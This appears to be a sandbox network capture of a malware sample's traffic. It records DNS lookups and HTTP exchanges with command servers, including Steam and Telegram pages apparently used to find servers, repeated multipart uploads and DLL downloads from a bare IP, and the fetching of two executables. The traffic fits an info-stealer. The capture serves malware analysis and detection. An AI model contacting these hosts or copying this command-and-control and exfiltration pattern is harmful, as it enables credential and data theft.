Remote address:172.67.205.129:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: possiwreeste.site
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kfsmsvtfbo4ddsrv68h8jsuus3; expires=Fri, 24 Jan 2025 04:26:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gprBReNzpUvXF4Ljc59GFxYcQjhDWZLiq%2BWBtlhvIWNLu9MsMx3dGWsvw%2F%2BrZ1qidq7hKEK2mzypLVXCYNu5BL5rsnLPxvmPj06RmVcmsCzd1H1oC6f88%2FoDBaywaQJr7GjiPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb396bfff244195-LHR
-
Remote address:172.67.205.129:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: possiwreeste.site
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=os5fvp126m8v2drtq2gr0t6eql; expires=Fri, 24 Jan 2025 04:26:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjFLnnTG3DTDAnnH%2FXOssK8fjoF2lBiDmizr4A8nRBWYT%2FM5vNaUBMW1mM8RdHcFPHSyLAXvmy3TmmC%2BhVtV4H5hEZDsRDd7gAyT3n16dOmlX4lW81rK2zAaPWuqEag0fOZ5Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb396c1fa734195-LHR
-
Remote address:8.8.8.8:53Requestfamikyjdiag.siteIN AResponse
-
Remote address:8.8.8.8:53Requestcommandejorsk.siteIN AResponse
-
Remote address:8.8.8.8:53Requestunderlinemdsj.siteIN AResponseunderlinemdsj.siteIN A104.21.1.169underlinemdsj.siteIN A172.67.129.166
-
Remote address:104.21.1.169:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: underlinemdsj.site
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=pcssp65funvvv1d5fpll6srl0d; expires=Fri, 24 Jan 2025 04:26:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwL8iNHItyOrbvAEcYYQi3JlweNWGH4CFqV55s%2B%2B89V3p%2Fuf8OldGlTYRp%2FCdsISFHHEEl4lF%2Ffit86fCJH9lj4WnwMerZH6h9lDdlWYxjwGHFs7iZ9xMGAMLsdJOU8ZqB0yIIo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb396c5be64bedf-LHR
-
Remote address:8.8.8.8:53Request129.205.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbellykmrebk.siteIN AResponse
-
Remote address:8.8.8.8:53Requestagentyanlark.siteIN AResponse
-
Remote address:8.8.8.8:53Requestwritekdmsnu.siteIN AResponse
-
Remote address:8.8.8.8:53Requestdelaylacedmn.siteIN AResponse
-
Remote address:8.8.8.8:53Requeststeamcommunity.comIN AResponsesteamcommunity.comIN A104.82.234.109
-
Remote address:104.82.234.109:443RequestGET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 30 Sep 2024 10:39:25 GMT
Content-Length: 34734
Connection: keep-alive
Set-Cookie: sessionid=1588e264885d1e512a49d9d7; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address:8.8.8.8:53Requestchaptermusu.storeIN AResponsechaptermusu.storeIN A172.67.207.133chaptermusu.storeIN A104.21.37.109
-
Remote address:172.67.207.133:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: chaptermusu.store
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=pj9vgi3aqbgf0t0rudptac908q; expires=Fri, 24 Jan 2025 04:26:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNzAzxMryRpW%2BLsqBJCgJ2YcMLi%2F5KuuarxAO%2FXNZSLW3mIRH8rhkt%2Fwm87M%2BWDRPXfwCtJQH12C9%2BxL62gS0YE2ErfI6EmrOI5SCGHEHFo%2BdcID4AP3zTMA7I9u2wV8pxuNYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb396cdacc4d1f7-LHR
-
Remote address:8.8.8.8:53Request169.1.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request109.234.82.104.in-addr.arpaIN PTRResponse109.234.82.104.in-addr.arpaIN PTRa104-82-234-109deploystaticakamaitechnologiescom
-
Remote address:46.8.231.109:80RequestGET / HTTP/1.1
Host: 46.8.231.109
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF
Host: 46.8.231.109
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
Host: 46.8.231.109
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ
Host: 46.8.231.109
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAE
Host: 46.8.231.109
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
Host: 46.8.231.109
Content-Length: 4739
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "6dde8-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "1f3950-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "3ef50-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestGET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "13bf0-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA
Host: 46.8.231.109
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
Host: 46.8.231.109
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
Host: 46.8.231.109
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB
Host: 46.8.231.109
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 184
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:46.8.231.109:80RequestPOST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
Host: 46.8.231.109
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:8.8.8.8:53Requestcowod.hopto.orgIN AResponsecowod.hopto.orgIN A45.132.206.251
-
Remote address:45.132.206.251:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCAEBFBKKJDHIDHIDBAE
Host: cowod.hopto.org
Content-Length: 2709
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Served-By: cowod.hopto.org
-
Remote address:149.154.167.99:443RequestGET /jamsemlg HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: stel_ssid=a24a0cfbc4f6be6b71_11082954543017583655
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12382
Connection: keep-alive
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
-
Remote address:8.8.8.8:53Request109.231.8.46.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.207.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request251.206.132.45.in-addr.arpaIN PTRResponse
-
Remote address:5.42.101.62:80RequestGET / HTTP/1.1
Host: urusvisa.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
Host: urusvisa.com
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
Host: urusvisa.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
Host: urusvisa.com
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
Host: urusvisa.com
Content-Length: 4765
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.101.62:80RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
Host: urusvisa.com
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request22.249.124.192.in-addr.arpaIN PTRResponse22.249.124.192.in-addr.arpaIN PTRcloudproxy10022sucurinet
-
Remote address:147.45.44.104:80RequestGET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1
Host: files.veritas.org.ng
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:32 GMT
Content-Type: application/octet-stream
Content-Length: 414248
Last-Modified: Mon, 30 Sep 2024 04:37:16 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fa2afc-65228"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
-
Remote address:147.45.44.104:80RequestGET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1
Host: files.veritas.org.ng
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 30 Sep 2024 10:39:32 GMT
Content-Type: application/octet-stream
Content-Length: 380456
Last-Modified: Mon, 30 Sep 2024 04:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66fa2b04-5ce28"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
-
Remote address:172.67.205.129:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: possiwreeste.site
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p5sq49in5ofuraqkg9nfv9mrc2; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqqPdnfNvS88zpSJ5rHFGLdbNAXYdlNw2DJgAdbS%2FdqiCTTS3R2ak7W%2BZ%2FcJXynNZfi3e44ttNp61G99PXsBWpcZODeG%2FjqTfYnVM%2Fq%2BcLDfBrM4ttAo9li1FxWhBuysfozthg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb396fd9f74cd21-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.205.129:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: possiwreeste.site
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=q2pcrrrhhceldpf7uedqgc5295; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNTmZhZhQKKhj%2F%2Fw9KZXul6adaZlBrAnFjRLiMvUTS3zI4DyBAsZkTIROynHDF6Rr%2BIVjf7KoNt9Ip5Vhw5fZdRjF7LOF7%2BcEgcFnngZC4JE%2FUK5ZHDUwYFNZlq17gDnr1XRXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb396ff9a8bcd21-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestfamikyjdiag.siteIN AResponse
-
Remote address:8.8.8.8:53Requestcommandejorsk.siteIN AResponse
-
Remote address:104.21.1.169:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: underlinemdsj.site
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=takl526ts02jt1cadqp777bcmp; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTw3fF5NclwHoc5%2ByZwug%2F%2FBCjWm2k3urqXRkbClYNU%2B54F%2F%2FetIG9h5DVB63neyOwz%2FeFlV54Sgv1Di6X8eGf7s25mAEbSxk9cX8GI7tOclcF%2FR%2FAuJYe1oHXn8b5DxhUIE1rE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb397021c3a8873-LHR
-
Remote address:8.8.8.8:53Requestbellykmrebk.siteIN AResponse
-
Remote address:8.8.8.8:53Requestagentyanlark.siteIN AResponse
-
Remote address:8.8.8.8:53Requestwritekdmsnu.siteIN AResponse
-
Remote address:8.8.8.8:53Requestdelaylacedmn.siteIN AResponse
-
Remote address:104.82.234.109:443RequestGET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 30 Sep 2024 10:39:35 GMT
Content-Length: 34734
Connection: keep-alive
Set-Cookie: sessionid=4f33dc0516c2e18b8ca0bd21; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address:172.67.207.133:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: chaptermusu.store
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
